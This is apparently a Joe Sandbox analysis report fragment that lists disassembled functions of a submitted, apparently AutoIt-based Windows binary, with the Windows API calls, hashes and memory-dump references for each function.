                                                                                                                  • Opcode ID: b708fa19eaf0a880b6c5a4daf0308cd987788c6395ca1e6ff0523427d9322285
                                                                                                                  • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                  • Opcode Fuzzy Hash: b708fa19eaf0a880b6c5a4daf0308cd987788c6395ca1e6ff0523427d9322285
                                                                                                                  • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                  • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4082120231-0
                                                                                                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2027346449-0
                                                                                                                  • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                  • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                  • GetMenu.USER32 ref: 0047A703
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                  • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3257027151-0
                                                                                                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                  APIs
                                                                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 215497628-0
                                                                                                                  • Opcode ID: 8b24b8fc49540e2cda342f08cea1577578ece83a8c9eaa006e60f73c0dcd2255
                                                                                                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                  • Opcode Fuzzy Hash: 8b24b8fc49540e2cda342f08cea1577578ece83a8c9eaa006e60f73c0dcd2255
                                                                                                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 0044443B
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00444633
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                  • API String ID: 1729044348-3025626884
                                                                                                                  • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                                                                  • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                                                                  • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                                                                  • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                  • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2354583917-0
                                                                                                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                  APIs
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 896007046-0
                                                                                                                  • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                  • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                  • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                  • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3429747543-0
                                                                                                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                    • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                    • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                  • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                  • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                  • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3300667738-0
                                                                                                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                  • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
